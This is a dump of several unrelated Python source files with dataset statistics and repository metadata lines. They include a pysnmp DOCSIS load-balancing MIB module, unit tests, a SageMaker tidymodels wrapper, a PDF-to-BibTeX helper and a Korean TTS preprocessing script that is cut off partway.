if mibBuilder.loadTexts: docsLoadBalPolicyRulePtr.setDescription('A pointer to an entry in a rule table. E.g., docsLoadBalBasicRuleEnable in docsLoadBalBasicRuleEntry. A value pointing to zeroDotZero, an inactive Row or a non-existing entry is treated as no rule defined for this policy entry.')
docsLoadBalPolicyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalPolicyRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyRowStatus.setDescription("The status of this conceptual row. There is no restriction on settings columns in this table when the value of docsLoadBalPolicyRowStatus is active(1). Setting this object to 'destroy' or 'notInService' for a row entry that is being referenced by docsLoadBalGrpDefaultPolicy in docsLoadBalGrpEntry returns an error code inconsistentValue.")
docsLoadBalBasicRuleTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2), )
if mibBuilder.loadTexts: docsLoadBalBasicRuleTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleTable.setDescription('DOCSIS defined basic ruleset for load Balancing Policy. This table enables or disables load balancing for the groups pointing to this ruleset in the policy group.')
docsLoadBalBasicRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleId"))
if mibBuilder.loadTexts: docsLoadBalBasicRuleEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleEntry.setDescription('An entry of DOCSIS defined basic ruleset. The object docsLoadBalBasicRuleEnable is used for instantiating an entry in this table via a RowPointer. Entries in this table persist after CMTS initialization.')
docsLoadBalBasicRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalBasicRuleId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleId.setDescription('The unique index for this row.')
docsLoadBalBasicRuleEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("disabledPeriod", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleEnable.setDescription('When using this ruleset, load balancing is enabled or disabled by the values enabled(1) and disabled(2) respectively. Additionally, a Load Balancing disabling period is defined in docsLoadBalBasicRuleDisStart and docsLoadBalBasicRuleDisPeriod if this object value is set to disabledPeriod(3).')
docsLoadBalBasicRuleDisStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 86400))).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisStart.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisStart.setDescription('if object docsLoadBalBasicRuleEnable is disablePeriod(3) Load Balancing is disabled starting at this object value time (seconds from 12 AM). Otherwise, this object has no meaning.')
docsLoadBalBasicRuleDisPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 86400))).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisPeriod.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisPeriod.setDescription('If object docsLoadBalBasicRuleEnable is disablePeriod(3) Load Balancing is disabled for the period of time defined between docsLoadBalBasicRuleDisStart and docsLoadBalBasicRuleDisStart plus the period of time of docsLoadBalBasicRuleDisPeriod. Otherwise, this object value has no meaning.')
docsLoadBalBasicRuleRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleRowStatus.setDescription("This object is to create or delete rows in this table. There is no restriction for changing this row status or object's values in this table at any time.")
docsLoadBalCmtsCmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4), )
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusTable.setDescription('The list contains the load balancing attributes associated with the cable modem. ')
docsLoadBalCmtsCmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1), )
docsIfCmtsCmStatusEntry.registerAugmentions(("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusEntry"))
docsLoadBalCmtsCmStatusEntry.setIndexNames(*docsIfCmtsCmStatusEntry.getIndexNames())
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusEntry.setDescription('Additional objects for docsIfCmtsCmStatusTable entry that relate to load balancing ')
docsLoadBalCmtsCmStatusGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroupId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroupId.setDescription('The Group ID associated with this cable modem.')
docsLoadBalCmtsCmStatusPolicyId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 2), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPolicyId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPolicyId.setDescription('The Policy ID associated with this cable modem.')
docsLoadBalCmtsCmStatusPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 3), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPriority.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPriority.setDescription('The Priority associated with this cable modem.')
docsLoadBalConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2))
docsLoadBalCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 1))
docsLoadBalGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2))
docsLoadBalBasicCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 1, 1)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalSystemGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalParametersGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalPoliciesGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalBasicCompliance = docsLoadBalBasicCompliance.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicCompliance.setDescription('The compliance statement for DOCSIS load balancing systems.')
docsLoadBalSystemGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 1)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverMacAddress"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverDownFrequency"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverUpChannelId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverCmd"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverCommit"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverLastCommit"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusMacAddr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusDownFreq"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusUpChnId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusCmd"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusValue"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusUpdate"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalSystemGroup = docsLoadBalSystemGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalSystemGroup.setDescription('A collection of objects providing system-wide parameters for load balancing.')
docsLoadBalParametersGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 2)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpIsRestricted"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpDefaultPolicy"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpChgOverSuccess"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpChgOverFails"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChannelStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsOperStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsRowStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmMACAddr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmMacAddrMask"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalParametersGroup = docsLoadBalParametersGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalParametersGroup.setDescription('A collection of objects containing the load balancing parameters.')
docsLoadBalPoliciesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 3)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRulePtr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalPoliciesGroup = docsLoadBalPoliciesGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPoliciesGroup.setDescription('A collection of objects providing policies.')
docsLoadBalBasicRuleGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 4)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleDisStart"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleDisPeriod"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalBasicRuleGroup = docsLoadBalBasicRuleGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleGroup.setDescription('DOCSIS defined basic Ruleset for load balancing policies.')
docsLoadBalCmtsCmStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 5)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusGroupId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusPolicyId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusPriority"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalCmtsCmStatusGroup = docsLoadBalCmtsCmStatusGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroup.setDescription('Cable mode status extension objects.')
mibBuilder.exportSymbols("DOCS-LOADBALANCING-MIB", docsLoadBalChgOverStatusEntry=docsLoadBalChgOverStatusEntry, docsLoadBalCmtsCmStatusTable=docsLoadBalCmtsCmStatusTable, docsLoadBalCmtsCmStatusEntry=docsLoadBalCmtsCmStatusEntry, docsLoadBalBasicRuleDisStart=docsLoadBalBasicRuleDisStart, docsLoadBalBasicCompliance=docsLoadBalBasicCompliance, docsLoadBalChnPairsIfIndexDepart=docsLoadBalChnPairsIfIndexDepart, docsLoadBalChgOverStatusValue=docsLoadBalChgOverStatusValue, docsLoadBalMibObjects=docsLoadBalMibObjects, docsLoadBalEnable=docsLoadBalEnable, docsLoadBalGrpChgOverFails=docsLoadBalGrpChgOverFails, docsLoadBalCmtsCmStatusPriority=docsLoadBalCmtsCmStatusPriority, docsLoadBalBasicRuleDisPeriod=docsLoadBalBasicRuleDisPeriod, docsLoadBalChgOverStatusMacAddr=docsLoadBalChgOverStatusMacAddr, docsLoadBalGrpDefaultPolicy=docsLoadBalGrpDefaultPolicy, docsLoadBalGrpInitTech=docsLoadBalGrpInitTech, docsLoadBalRestrictCmStatus=docsLoadBalRestrictCmStatus, docsLoadBalChgOverGroup=docsLoadBalChgOverGroup, docsLoadBalChnPairsIfIndexArrive=docsLoadBalChnPairsIfIndexArrive, docsLoadBalChgOverLastCommit=docsLoadBalChgOverLastCommit, docsLoadBalPolicyEntry=docsLoadBalPolicyEntry, docsLoadBalChgOverStatusUpdate=docsLoadBalChgOverStatusUpdate, docsLoadBalChannelEntry=docsLoadBalChannelEntry, docsLoadBalChnPairsEntry=docsLoadBalChnPairsEntry, docsLoadBalGrpIsRestricted=docsLoadBalGrpIsRestricted, docsLoadBalSystem=docsLoadBalSystem, docsLoadBalChnPairsInitTech=docsLoadBalChnPairsInitTech, docsLoadBalBasicRuleGroup=docsLoadBalBasicRuleGroup, docsLoadBalChgOverStatusUpChnId=docsLoadBalChgOverStatusUpChnId, docsLoadBalParametersGroup=docsLoadBalParametersGroup, docsLoadBalBasicRuleEntry=docsLoadBalBasicRuleEntry, docsLoadBalRestrictCmMacAddrMask=docsLoadBalRestrictCmMacAddrMask, docsLoadBalPolicyRulePtr=docsLoadBalPolicyRulePtr, docsLoadBalGrpStatus=docsLoadBalGrpStatus, docsLoadBalSystemGroup=docsLoadBalSystemGroup, docsLoadBalGrpChgOverSuccess=docsLoadBalGrpChgOverSuccess, docsLoadBalPolicyObjects=docsLoadBalPolicyObjects, docsLoadBalGroups=docsLoadBalGroups, docsLoadBalanceMib=docsLoadBalanceMib, docsLoadBalChgOverInitTech=docsLoadBalChgOverInitTech, docsLoadBalChgOverStatusDownFreq=docsLoadBalChgOverStatusDownFreq, docsLoadBalGrpObjects=docsLoadBalGrpObjects, docsLoadBalChnPairsTable=docsLoadBalChnPairsTable, docsLoadBalCompliances=docsLoadBalCompliances, docsLoadBalCmtsCmStatusPolicyId=docsLoadBalCmtsCmStatusPolicyId, docsLoadBalGrpEnable=docsLoadBalGrpEnable, docsLoadBalBasicRuleRowStatus=docsLoadBalBasicRuleRowStatus, docsLoadBalChgOverStatusInitTech=docsLoadBalChgOverStatusInitTech, docsLoadBalGrpTable=docsLoadBalGrpTable, docsLoadBalChgOverCmd=docsLoadBalChgOverCmd, docsLoadBalGrpEntry=docsLoadBalGrpEntry, docsLoadBalRestrictCmIndex=docsLoadBalRestrictCmIndex, docsLoadBalChannelTable=docsLoadBalChannelTable, docsLoadBalChgOverObjects=docsLoadBalChgOverObjects, docsLoadBalPolicyTable=docsLoadBalPolicyTable, docsLoadBalBasicRuleTable=docsLoadBalBasicRuleTable, docsLoadBalGrpId=docsLoadBalGrpId, docsLoadBalChgOverDownFrequency=docsLoadBalChgOverDownFrequency, docsLoadBalChgOverUpChannelId=docsLoadBalChgOverUpChannelId, docsLoadBalChgOverCommit=docsLoadBalChgOverCommit, docsLoadBalPolicyRowStatus=docsLoadBalPolicyRowStatus, docsLoadBalRestrictCmMACAddr=docsLoadBalRestrictCmMACAddr, docsLoadBalPolicyId=docsLoadBalPolicyId, docsLoadBalRestrictCmTable=docsLoadBalRestrictCmTable, PYSNMP_MODULE_ID=docsLoadBalanceMib, docsLoadBalNotifications=docsLoadBalNotifications, 
docsLoadBalBasicRuleEnable=docsLoadBalBasicRuleEnable, docsLoadBalPolicyRuleId=docsLoadBalPolicyRuleId, docsLoadBalChnPairsOperStatus=docsLoadBalChnPairsOperStatus, docsLoadBalChgOverMacAddress=docsLoadBalChgOverMacAddress, docsLoadBalRestrictCmEntry=docsLoadBalRestrictCmEntry, docsLoadBalBasicRuleId=docsLoadBalBasicRuleId, docsLoadBalChannelIfIndex=docsLoadBalChannelIfIndex, docsLoadBalCmtsCmStatusGroup=docsLoadBalCmtsCmStatusGroup, docsLoadBalConformance=docsLoadBalConformance, docsLoadBalCmtsCmStatusGroupId=docsLoadBalCmtsCmStatusGroupId, docsLoadBalChannelStatus=docsLoadBalChannelStatus, docsLoadBalChnPairsRowStatus=docsLoadBalChnPairsRowStatus, docsLoadBalChgOverStatusTable=docsLoadBalChgOverStatusTable, ChannelChgInitTechMap=ChannelChgInitTechMap, docsLoadBalChgOverStatusCmd=docsLoadBalChgOverStatusCmd, docsLoadBalPoliciesGroup=docsLoadBalPoliciesGroup)
| 187.552529
| 4,381
| 0.801954
| 1,167
| 0.024211
| 0
| 0
| 0
| 0
| 0
| 0
| 22,276
| 0.462148
|
65c5048befc6241d54580f74f3551d1f18adabab
| 671
|
py
|
Python
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 1
|
2020-12-11T05:54:59.000Z
|
2020-12-11T05:54:59.000Z
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 1
|
2021-04-10T06:53:30.000Z
|
2021-04-10T06:53:30.000Z
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 7
|
2019-11-24T12:10:35.000Z
|
2020-12-14T22:36:31.000Z
|
from permutation_palindrome import is_permutation_palindrome
import unittest
class TestIsPermutationPalindrome(unittest.TestCase):
def test_returns_true_if_possible_palindrome(self):
"""Returns true if a palindrome is possible with a given permutation of a string"""
result = is_permutation_palindrome("hdhdiuigygyoioi")
self.assertTrue(result)
def test_returns_false_if_not_possible_palindrome(self):
"""Returns false if a palindrome is not possible with a given permutation of a string"""
result = is_permutation_palindrome("ahsidfha")
self.assertFalse(result)
if __name__ == "__main__":
unittest.main()
| 35.315789
| 96
| 0.754098
| 542
| 0.80775
| 0
| 0
| 0
| 0
| 0
| 0
| 208
| 0.309985
|
65c5b96f2aa86a20d59448029f070a81f3667eea
| 3,199
|
py
|
Python
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | 3
|
2020-11-23T18:16:05.000Z
|
2021-03-23T16:48:24.000Z
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | 4
|
2020-07-25T21:49:55.000Z
|
2020-08-03T15:37:49.000Z
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | null | null | null |
from sagemaker.estimator import Framework
from sagemaker.model import FrameworkModel
from sagemaker.predictor import RealTimePredictor
import subprocess
def _run_command(command):
return (
subprocess.run(command.split(" "), stdout=subprocess.PIPE,)
.stdout.decode("utf-8")
.strip()
)
def get_account():
command = "aws sts get-caller-identity --query Account --output text"
return _run_command(command)
def get_region():
command = "aws configure get region"
return _run_command(command)
def get_role(profile="sagemaker"):
command = "aws configure get role_arn --profile {}".format(profile)
return _run_command(command)
class TidymodelsPredictor(RealTimePredictor):
def __init__(self, endpoint_name, sagemaker_session=None, **kwargs):
super(TidymodelsPredictor, self).__init__(
endpoint_name, sagemaker_session=sagemaker_session, **kwargs
)
class TidymodelsModel(FrameworkModel):
    # `FrameworkModel` accepts a `dependencies` argument to make more code available
# in `/opt/ml/code`: https://github.com/aws/sagemaker-python-sdk/blob/8b2d5c8d73236b59bca6fdcaf96f227a01488288/src/sagemaker/model.py#L704-L712
__framework_name__ = "tidymodels"
def __init__(
self,
model_data,
image,
role,
entry_point,
predictor_cls=TidymodelsPredictor,
**kwargs
):
super(TidymodelsModel, self).__init__(
model_data, image, role, entry_point, predictor_cls=predictor_cls, **kwargs
)
class Tidymodels(Framework):
def __init__(self, entry_point, image_name, role, train_instance_type, **kwargs):
train_instance_count = kwargs.get("train_instance_count")
if train_instance_count:
if train_instance_count != 1:
raise AttributeError(
"Tidymodels does not support distributed training. "
"Please remove the 'train_instance_count' argument or set "
"'train_instance_count=1' when initializing SKLearn."
)
super(Tidymodels, self).__init__(
entry_point=entry_point,
image_name=image_name,
role=role,
train_instance_type=train_instance_type,
**dict(kwargs, train_instance_count=1)
)
def create_model(
self, entry_point=None, source_dir=None, dependencies=None, role=None, **kwargs
):
return TidymodelsModel(
model_data=self.model_data,
image=self.image_name,
role=(role or self.role),
entry_point=(entry_point or self.entry_point),
source_dir=(source_dir or self._model_source_dir()),
dependencies=(dependencies or self.dependencies),
**kwargs
)
@classmethod
def _prepare_init_params_from_job_description(
cls, job_details, model_channel_name=None
):
init_params = super(Tidymodels, cls)._prepare_init_params_from_job_description(
job_details, model_channel_name
)
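        # The training job description stores the container image under the key
        # 'image'; rename it to match this estimator's 'image_name' constructor argument.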
init_params["image_name"] = init_params.pop("image")
return init_params
| 30.759615
| 147
| 0.660832
| 2,506
| 0.78337
| 0
| 0
| 353
| 0.110347
| 0
| 0
| 586
| 0.183182
|
65c60fb41ff8d93478e349410ca2f8f7c41a7cea
| 835
|
py
|
Python
|
articles/pdf2bib.py
|
kenbeese/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | 4
|
2015-02-07T10:04:50.000Z
|
2022-01-17T18:33:26.000Z
|
articles/pdf2bib.py
|
termoshtt/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | null | null | null |
articles/pdf2bib.py
|
termoshtt/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
def pdf2text(pdf_path, encoding="ASCII7"):
import subprocess
import os.path
pdf_path = os.path.abspath(pdf_path)
subprocess.call(["pdftotext","-l","1","-enc",encoding,"-q",pdf_path])
text = os.path.splitext(pdf_path)[0] + ".txt"
return text
def pick_out_doi(txt):
import re
body = open(txt)
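    # Match a DOI of the form 10.<registrant>/<suffix>; this is a commonly used
    # pattern for Crossref-style DOIs.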
reg = re.compile(r'\b(10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?!["&\'<>,])\S)+)\b')
m = reg.search(body.read())
    if m is None:
raise Warning("DOI is not found.")
else:
return m.group(0)
def doi2bib(doi):
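    # Resolve the DOI through dx.doi.org content negotiation, requesting a BibTeX
    # representation via the Accept header (Python 2 urllib2 API).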
import urllib2
uri = "http://dx.doi.org/"
edoi = urllib2.quote(doi)
url = uri + edoi
    req = urllib2.Request(url, headers={"Accept": "text/bibliography; style=bibtex"})
bibstr = urllib2.urlopen(req).read()
return unicode(bibstr, "utf-8")
| 27.833333
| 86
| 0.589222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 201
| 0.240719
|
65c64d0d6e346b2c86db0238e477f1aee46d6160
| 2,313
|
py
|
Python
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 4
|
2021-06-02T03:21:44.000Z
|
2021-11-08T09:47:24.000Z
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 7
|
2021-11-10T20:21:23.000Z
|
2022-03-22T19:18:39.000Z
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 3
|
2021-05-09T13:41:29.000Z
|
2021-06-24T06:12:05.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpointing the TextLineDataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import reader_dataset_ops_test_base
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import combinations
from tensorflow.python.platform import test
class TextLineDatasetCheckpointTest(
reader_dataset_ops_test_base.TextLineDatasetTestBase,
checkpoint_test_base.CheckpointTestBase, parameterized.TestCase):
def _build_iterator_graph(self, test_filenames, compression_type=None):
return core_readers.TextLineDataset(
test_filenames, compression_type=compression_type, buffer_size=10)
@combinations.generate(test_base.default_test_combinations())
def testTextLineCore(self):
compression_types = [None, "GZIP", "ZLIB"]
num_files = 5
lines_per_file = 5
num_outputs = num_files * lines_per_file
for compression_type in compression_types:
test_filenames = self._createFiles(
num_files,
lines_per_file,
crlf=True,
compression_type=compression_type)
# pylint: disable=cell-var-from-loop
self.run_core_tests(
lambda: self._build_iterator_graph(test_filenames, compression_type),
num_outputs)
# pylint: enable=cell-var-from-loop
if __name__ == "__main__":
test.main()
| 39.20339
| 89
| 0.750108
| 1,000
| 0.432339
| 0
| 0
| 641
| 0.277129
| 0
| 0
| 818
| 0.353653
|
65c8b9280ebaf25f0fb4b1658671be5a8f2ed641
| 228
|
py
|
Python
|
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
#Author:Li Shen
from django import forms
from apps.forms import FormMixin
class PublicCommentForm(forms.Form, FormMixin):
    # CharField length may be left undefined in a form, but it must be defined in the model
    content = forms.CharField()
    news_id = forms.IntegerField()
| 22.8
| 46
| 0.79386
| 187
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.333333
|
65c9968621cc82c96799c6059ed2551c70dfc1c5
| 6,446
|
py
|
Python
|
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
### Data Preprocessing
## 1. Json to Transcript
## 2. Aligner
## 3. Text Replace
from jamo import h2j
import json
import os, re, tqdm
import unicodedata
from tqdm import tqdm
import hparams as hp
name = hp.dataset
first_dir = os.getcwd()
transcript = name + '_transcript.txt'
dict_name = name + '_korean_dict.txt'
data_dir = 'wavs'
json_label_dir = 'label'
def change_name(base_dir, format):
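    # Rename each speaker directory and its files to digit-only names; on a name
    # collision the leading digit is overwritten with an incrementing counter.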
print('Change', format, 'name')
cnt = 0
speaker_table = os.listdir(base_dir)
new_speaker_table = []
for speaker in speaker_table:
if cnt == 0:
os.chdir(base_dir)
new_speaker_name = re.sub(r'[^0-9]', '', speaker)
overlap = 1
while new_speaker_name in new_speaker_table:
print(new_speaker_name, 'is dangerous')
new_speaker_name = str(overlap) + new_speaker_name[1:]
overlap += 1
new_speaker_table.append(re.sub(r'[^0-9]', '', new_speaker_name))
print(new_speaker_name, 'ok')
temp = 0
for wav in os.listdir(speaker):
if temp == 0:
os.chdir(speaker)
new_wav_name = re.sub(r'[^0-9]', '', wav)
